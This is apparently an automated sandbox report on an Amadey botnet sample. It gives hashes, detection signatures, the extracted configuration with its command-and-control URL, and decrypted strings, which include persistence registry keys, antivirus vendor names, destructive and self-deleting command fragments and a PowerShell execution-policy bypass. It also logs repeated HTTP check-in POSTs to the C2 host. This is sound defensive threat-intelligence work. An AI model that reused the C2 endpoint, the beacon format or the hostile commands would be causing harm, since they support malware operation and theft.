Edit tour

Windows Analysis Report
6uHfmjGMfL.exe

Overview

General Information

Sample name:	6uHfmjGMfL.exe renamed because original name is a hash value
Original sample name:	89796a9b6072d2334db09c8b41a64c57.exe
Analysis ID:	1585768
MD5:	89796a9b6072d2334db09c8b41a64c57
SHA1:	bb0e78329ec39982aa2b3b4064375a534170aa43
SHA256:	c847c70bdc3eecede3b89f4d7c88ad538271ea92fcfc3e6bb2ea6e22b83d4d61
Tags:	exeuser-abuse_ch
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys Clipper DLL

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

6uHfmjGMfL.exe (PID: 3868 cmdline: "C:\Users\user\Desktop\6uHfmjGMfL.exe" MD5: 89796A9B6072D2334DB09C8B41A64C57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "clientservices.sgoogleapis.observer/api/index.php", "Version": "5.12", "Install Folder": "a9117c48af", "Install File": "Gxtuum.exe"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
6uHfmjGMfL.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.6uHfmjGMfL.exe.cb0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.2.6uHfmjGMfL.exe.cb0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Suricata Signatures

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T08:44:05.634067+0100	2856147	1	A Network Trojan was detected	192.168.2.5	49708	104.21.80.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 6uHfmjGMfL.exe

Malware Configuration Extractor: Amadey {"C2 url": "clientservices.sgoogleapis.observer/api/index.php", "Version": "5.12", "Install Folder": "a9117c48af", "Install File": "Gxtuum.exe"}

Multi AV Scanner detection for submitted file

Source: 6uHfmjGMfL.exe	Virustotal: Detection: 55%			Perma Link
Source: 6uHfmjGMfL.exe	ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: 6uHfmjGMfL.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: clientservices.sgoogleapis.observer
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: /api/index.php
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: S-%lu-
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: a9117c48af
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Gxtuum.exe
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Startup
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: rundll32
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Programs
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: %USERPROFILE%
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: cred.dll
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: clip.dll
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: http://
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: https://
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: /quiet
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: /Plugins/
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: &unit=
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: shell32.dll
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: kernel32.dll
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: ProgramData\
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: AVAST Software
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Kaspersky Lab
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Panda Security
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Doctor Web
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: 360TotalSecurity
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Bitdefender
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Norton
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Sophos
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Comodo
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: WinDefender
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: 0123456789
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: ------
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: ?scr=1
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: ComputerName
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: -unicode-
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: VideoID
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: ProductName
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: CurrentBuild
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: rundll32.exe
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: "taskkill /f /im "
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: " && timeout 1 && del
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: && Exit"
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: " && ren
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Powershell.exe
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: shutdown -s -t 0
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: random
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Keyboard Layout\Preload
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: 00000419
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: 00000422
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: 00000423
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: 0000043f
Source: 00000000.00000000.2005480948.0000000000D01000.00000002.00000001.01000000.00000003.sdmp	String decryptor: R9}*Y"

Source: 6uHfmjGMfL.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6uHfmjGMfL.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CEF0C1 FindFirstFileExW,

0_2_00CEF0C1

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49708 -> 104.21.80.1:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: clientservices.sgoogleapis.observer/api/index.php

Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
